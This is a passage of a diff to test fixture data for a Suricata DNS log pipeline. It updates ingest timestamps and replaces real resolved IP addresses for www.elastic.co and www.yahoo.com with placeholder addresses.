"{\"timestamp\":\"2019-08-22T23:48:48.902685+0000\",\"flow_id\":2130691028471842,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":41979,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":4210,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":299,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0600:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0000:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0200:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0400:0000:0000:0000:0000:0729\"}],\"grouped\":{\"AAAA\":[\"2a04:4e42:0600:0000:0000:0000:0000:0729\",\"2a04:4e42:0000:0000:0000:0000:0000:0729\",\"2a04:4e42:0200:0000:0000:0000:0000:0729\",\"2a04:4e42:0400:0000:0000:0000:0000:0729\"],\"CNAME\":[\"dualstack.r2.shared.global.fastly.net\"]}}}", + "ingested": "2021-12-09T13:45:26.597924700Z", + "original": "{\"timestamp\":\"2019-08-22T23:48:48.902685+0000\",\"flow_id\":2130691028471842,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":41979,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":4210,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":299,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0200:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0400:0000:0000:0000:0000:0729\"}],\"grouped\":{\"AAAA\":[\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"2a04:4e42:0200:0000:0000:0000:0000:0729\",\"2a04:4e42:0400:0000:0000:0000:0000:0729\"],\"CNAME\":[\"dualstack.r2.shared.global.fastly.net\"]}}}", "category": [ "network" ], @@ -688,7 +684,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853431500Z", + "ingested": "2021-12-09T13:45:26.597931Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.812655+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":44773,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":28329,\"rrname\":\"www.yahoo.com\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -752,7 +748,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853449200Z", + "ingested": "2021-12-09T13:45:26.597936600Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.812828+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":55246,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":7050,\"rrname\":\"www.yahoo.com\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -829,7 +825,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853454500Z", + "ingested": "2021-12-09T13:45:26.597942100Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.yahoo.com\",\"rrtype\":\"CNAME\",\"ttl\":1315,\"rdata\":\"atsv2-fp-shed.wg1.b.yahoo.com\"}}", "category": [ "network" @@ -849,7 +845,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "98.138.219.232" + "175.16.199.1" ], "question": { "top_level_domain": "com", @@ -859,7 +855,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "98.138.219.232", + "data": "175.16.199.1", "type": "A", "ttl": 15 } @@ -889,7 +885,7 @@ }, "related": { "ip": [ - "98.138.219.232", + "175.16.199.1", "10.0.2.3" ] }, @@ -898,7 +894,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "98.138.219.232", + "rdata": "175.16.199.1", "rcode": "NOERROR", "id": 28329, "type": "answer", @@ -910,8 +906,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853459500Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"98.138.219.232\"}}", + "ingested": "2021-12-09T13:45:26.597947500Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" ], @@ -930,7 +926,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "98.138.219.231" + "175.16.199.1" ], "question": { "top_level_domain": "com", @@ -940,7 +936,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "98.138.219.231", + "data": "175.16.199.1", "type": "A", "ttl": 15 } @@ -970,7 +966,7 @@ }, "related": { "ip": [ - "98.138.219.231", + "175.16.199.1", "10.0.2.3" ] }, @@ -979,7 +975,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "98.138.219.231", + "rdata": "175.16.199.1", "rcode": "NOERROR", "id": 28329, "type": "answer", @@ -991,8 +987,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853463400Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"98.138.219.231\"}}", + "ingested": "2021-12-09T13:45:26.597953900Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" ], @@ -1011,7 +1007,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "72.30.35.10" + "175.16.199.1" ], "question": { "top_level_domain": "com", @@ -1021,7 +1017,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "72.30.35.10", + "data": "175.16.199.1", "type": "A", "ttl": 15 } @@ -1051,7 +1047,7 @@ }, "related": { "ip": [ - "72.30.35.10", + "175.16.199.1", "10.0.2.3" ] }, @@ -1060,7 +1056,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "72.30.35.10", + "rdata": "175.16.199.1", "rcode": "NOERROR", "id": 28329, "type": "answer", @@ -1072,8 +1068,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853467Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"72.30.35.10\"}}", + "ingested": "2021-12-09T13:45:26.597958900Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" ], @@ -1092,7 +1088,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "72.30.35.9" + "175.16.199.1" ], "question": { "top_level_domain": "com", @@ -1102,7 +1098,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "72.30.35.9", + "data": "175.16.199.1", "type": "A", "ttl": 15 } @@ -1132,7 +1128,7 @@ }, "related": { "ip": [ - "72.30.35.9", + "175.16.199.1", "10.0.2.3" ] }, @@ -1141,7 +1137,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "72.30.35.9", + "rdata": "175.16.199.1", "rcode": "NOERROR", "id": 28329, "type": "answer", @@ -1153,8 +1149,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853474900Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"72.30.35.9\"}}", + "ingested": "2021-12-09T13:45:26.597964700Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" ], @@ -1230,7 +1226,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853479Z", + "ingested": "2021-12-09T13:45:26.597969800Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.yahoo.com\",\"rrtype\":\"CNAME\",\"ttl\":1268,\"rdata\":\"atsv2-fp-shed.wg1.b.yahoo.com\"}}", "category": [ "network" @@ -1250,7 +1246,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2001:4998:0058:1836:0000:0000:0000:0010" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "question": { "top_level_domain": "com", @@ -1260,7 +1256,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "2001:4998:0058:1836:0000:0000:0000:0010", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 53 } @@ -1290,7 +1286,7 @@ }, "related": { "ip": [ - "2001:4998:0058:1836:0000:0000:0000:0010", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "10.0.2.3" ] }, @@ -1299,7 +1295,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "2001:4998:0058:1836:0000:0000:0000:0010", + "rdata": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "rcode": "NOERROR", "id": 7050, "type": "answer", @@ -1311,8 +1307,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853482600Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2001:4998:0058:1836:0000:0000:0000:0010\"}}", + "ingested": "2021-12-09T13:45:26.597975700Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" ], @@ -1331,7 +1327,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2001:4998:0044:041d:0000:0000:0000:0003" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "question": { "top_level_domain": "com", @@ -1341,7 +1337,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "2001:4998:0044:041d:0000:0000:0000:0003", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 53 } @@ -1371,7 +1367,7 @@ }, "related": { "ip": [ - "2001:4998:0044:041d:0000:0000:0000:0003", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "10.0.2.3" ] }, @@ -1380,7 +1376,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "2001:4998:0044:041d:0000:0000:0000:0003", + "rdata": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "rcode": "NOERROR", "id": 7050, "type": "answer", @@ -1392,8 +1388,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853486Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2001:4998:0044:041d:0000:0000:0000:0003\"}}", + "ingested": "2021-12-09T13:45:26.597980400Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" ], @@ -1412,7 +1408,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2001:4998:0058:1836:0000:0000:0000:0011" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "question": { "top_level_domain": "com", @@ -1422,7 +1418,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "2001:4998:0058:1836:0000:0000:0000:0011", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 53 } @@ -1452,7 +1448,7 @@ }, "related": { "ip": [ - "2001:4998:0058:1836:0000:0000:0000:0011", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "10.0.2.3" ] }, @@ -1461,7 +1457,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "2001:4998:0058:1836:0000:0000:0000:0011", + "rdata": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "rcode": "NOERROR", "id": 7050, "type": "answer", @@ -1473,8 +1469,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853489400Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2001:4998:0058:1836:0000:0000:0000:0011\"}}", + "ingested": "2021-12-09T13:45:26.597986200Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" ], @@ -1493,7 +1489,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2001:4998:0044:041d:0000:0000:0000:0004" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "question": { "top_level_domain": "com", @@ -1503,7 +1499,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "2001:4998:0044:041d:0000:0000:0000:0004", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 53 } @@ -1533,7 +1529,7 @@ }, "related": { "ip": [ - "2001:4998:0044:041d:0000:0000:0000:0004", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "10.0.2.3" ] }, @@ -1542,7 +1538,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "2001:4998:0044:041d:0000:0000:0000:0004", + "rdata": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "rcode": "NOERROR", "id": 7050, "type": "answer", @@ -1554,8 +1550,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853493300Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2001:4998:0044:041d:0000:0000:0000:0004\"}}", + "ingested": "2021-12-09T13:45:26.598007600Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" ], @@ -1618,7 +1614,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853497100Z", + "ingested": "2021-12-09T13:45:26.598013Z", "original": "{\"timestamp\":\"2019-08-23T02:03:36.578089+0000\",\"flow_id\":2181951993205289,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":48288,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":9104,\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -1682,7 +1678,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853500700Z", + "ingested": "2021-12-09T13:45:26.598017400Z", "original": "{\"timestamp\":\"2019-08-23T02:03:36.578262+0000\",\"flow_id\":928596784370390,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":59203,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":12859,\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -1702,10 +1698,10 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "151.101.194.217", - "151.101.2.217", - "151.101.66.217", - "151.101.130.217" + "175.16.199.1", + "175.16.199.1", + "175.16.199.1", + "175.16.199.1" ], "question": { "name": "www.elastic.co", @@ -1723,25 +1719,25 @@ }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.194.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.2.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.66.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.130.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 } @@ -1771,10 +1767,7 @@ }, "related": { "ip": [ - "151.101.194.217", - "151.101.2.217", - "151.101.66.217", - "151.101.130.217", + "175.16.199.1", "10.0.2.3" ] }, @@ -1793,8 +1786,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853518400Z", - "original": "{\"timestamp\":\"2019-08-23T02:03:36.619381+0000\",\"flow_id\":2181951993205289,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":48288,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":9104,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":150,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.194.217\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.2.217\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.66.217\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.130.217\"}]}}", + "ingested": "2021-12-09T13:45:26.598022800Z", + "original": "{\"timestamp\":\"2019-08-23T02:03:36.619381+0000\",\"flow_id\":2181951993205289,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":48288,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":9104,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":150,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":